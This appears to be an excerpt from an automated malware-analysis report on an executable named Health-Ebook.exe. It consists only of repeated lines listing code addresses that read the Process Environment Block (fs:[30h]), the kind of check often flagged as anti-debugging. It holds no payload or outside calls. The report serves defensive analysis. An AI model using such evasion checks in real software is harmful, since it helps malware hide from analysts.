Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52E79A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CAF81 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2782 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52A7B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CFFAC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CFFAC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50CE50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50E650 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53DE50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F545651 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F545651 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D7E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50CE70 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53A675 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F532616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F522600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50A60B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50A60B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52FE37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53CE34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53CE34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F501638 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F59BE30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F59BE30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D9623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5466D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C0EFB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F504EFE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F504EFE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5316E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5316E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50C692 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D969E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516682 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F503EA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F503EA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D86A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53056B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50356C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50356C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C0D1B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F593D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D952E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53E52F mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53E52F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F53E52F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5095C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5095C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F584DCA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F584DCA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5375F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5375F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F532DF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5015E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D85EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B1DE3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B1DE3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B1DE3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D5595 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5AE58A mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D8589 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C0D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F530584 mov eax, dword ptr fs:[00000030h]2_2_1F530584
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE581 mov eax, dword ptr fs:[00000030h]2_2_1F5CE581
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5035B1 mov eax, dword ptr fs:[00000030h]2_2_1F5035B1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C15A8 mov eax, dword ptr fs:[00000030h]2_2_1F5C15A8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F549DAF mov eax, dword ptr fs:[00000030h]2_2_1F549DAF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C145F mov eax, dword ptr fs:[00000030h]2_2_1F5C145F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE455 mov eax, dword ptr fs:[00000030h]2_2_1F5CE455
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D8452 mov eax, dword ptr fs:[00000030h]2_2_1F5D8452
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593C47 mov eax, dword ptr fs:[00000030h]2_2_1F593C47
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F527C7D mov eax, dword ptr fs:[00000030h]2_2_1F527C7D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58E460 mov eax, dword ptr fs:[00000030h]2_2_1F58E460
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BAC60 mov eax, dword ptr fs:[00000030h]2_2_1F5BAC60
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BAC60 mov eax, dword ptr fs:[00000030h]2_2_1F5BAC60
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50646B mov eax, dword ptr fs:[00000030h]2_2_1F50646B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50646B mov eax, dword ptr fs:[00000030h]2_2_1F50646B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521410 mov ecx, dword ptr fs:[00000030h]2_2_1F521410
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CA416 mov eax, dword ptr fs:[00000030h]2_2_1F5CA416
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CA416 mov eax, dword ptr fs:[00000030h]2_2_1F5CA416
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F501C09 mov eax, dword ptr fs:[00000030h]2_2_1F501C09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593C38 mov eax, dword ptr fs:[00000030h]2_2_1F593C38
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F530430 mov eax, dword ptr fs:[00000030h]2_2_1F530430
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0C29 mov eax, dword ptr fs:[00000030h]2_2_1F5C0C29
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
